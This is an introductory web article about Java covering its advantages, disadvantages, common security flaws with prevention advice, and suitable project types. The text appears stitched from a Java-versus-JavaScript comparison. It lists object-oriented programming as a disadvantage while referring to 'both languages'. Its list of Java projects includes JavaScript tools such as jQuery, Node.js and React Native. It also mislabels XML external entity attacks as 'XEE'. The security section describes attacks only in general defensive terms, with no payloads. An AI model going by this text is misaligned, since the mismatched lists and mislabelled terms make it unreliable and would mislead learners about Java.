What is Java?
Java is a general purpose programming language designed with one mantra in mind—”write once, run anywhere.” Java applications are compiled into bytecode that can run on implementations of the Java Virtual Machine (JVM). JVM helps bridge the gap between source code and the 1s and 0s that the computer understands. Any machine that has the JVM installed can run Java. In web development, Java features most prominently as a server-side language and the programming language of choice for mobile apps on the Android platform. It also still has a decent presence on the front-end as a Java applet, although this is falling out of favor due to security concerns.
Advantages of Java
As a general purpose programming language that has served as a backbone of many enterprise applications, Java advantages include:
- Widely used for enterprise, desktop, and Android apps. Java boasts a large active developer community and a mature development ecosystem with libraries, frameworks, and tools for every application.
- Short learning curve. Java’s long history and ubiquity, means there are plenty of tutorials, guides, and courses. If you encounter a problem, chances are high your question was already solved on StackOverflow.
- Cross-platform mobility. The JVM makes it possible to run Java apps on any device or operating system that has the JVM installed.
- Java Class Concurrency. Java’s built-in support for multithreading makes it easier to run tasks simultaneously maintaining parallel concurrency.
- Speed and performance. As a compiled language, Java is slower to start, but faster to run.
Disadvantages of Java
Cons of using Java include:
- Security vulnerabilities. Because Java has been around a long time, the language’s inherent vulnerabilities are well understood by both security professionals and hackers alike. Java programmers must be vigilant about using the following security best practices such as keeping tools, libraries, and frameworks up to date.
- Memory hog. Java is notoriously known for its high memory requirements—the price you pay for thread-level concurrency is that each thread gets a certain amount of memory for its stack.
- Object-Oriented Programming (OOP). Both languages require the developer to code in terms of objects and their relationships to one another. By extension this gives both languages access to techniques like inheritance, encapsulation, and polymorphism.
Java security vulnerabilities and best practices
Common Java security vulnerabilities include:
- SQL injection is a vulnerability that occurs when a web application fails to sanitize user input into forms and other UI components. The attacker can submit a SQL query to execute SQL commands on the back end of your web app. To prevent SQL injection, it’s important to sanitize user inputs within your application and avoid using dynamic database queries altogether by sticking to prepared statements or parameterized queries.
- XML external entities (XEE) are a known vulnerability of Java libraries that parse XML. When a weakly configured XML parser processes malicious XML input containing a reference to an external entity, the attacker is able to modify that external entity to point to any location on the host machine (e.g., stored user data). It’s a common attack vector for denial of service attacks, server-side request forgeries, and port scanners. The best way to prevent XEE injection is to manually limit the capabilities of your XML parsers by disabling DTD processing. In cases where some DTD processing is required, proper configuration, encryption, and constant code scanning, can protect you against XEE.
- Cross-site scripting (XSS) attacks. Websites or web apps that fail to implement a same origin policy are vulnerable to an XSS attack in which the attacker hijacks the webpage to deliver malicious code to visitors. The key to preventing XSS attacks is to filter input on arrival where user input is received, encode data on output, and using appropriate response headers to ensure browsers interpret your data correctly. Finally a content security policy (CSP) can monitor, detect, and stop XSS attacks when they occur.
You should consider Java if your project involves…
- Android Apps
- Enterprise Software
- Scientific Computing
- Big Data Analytics
- General Purpose Programming of Hardware
- Server-Side Technologies like Apache, JBoss, Geronimo, GlassFish, etc.
- Dynamic single page applications (SPAs)
- Front-End technologies like jQuery, AngularJS, Backbone.js, Ember.js, ReactJS etc.
- Server-Side technologies like Node.js, MongoDB, Express.js, etc.
- Mobile App Development through PhoneGap, React Native, etc.
Keep in mind that neither list is extensive, these are only meant as a starting point to help you get a feel for what you can expect and what keywords you can use to assess the best language for your needs.
Get This Article as a PDF
For easy printing, reading, and sharing.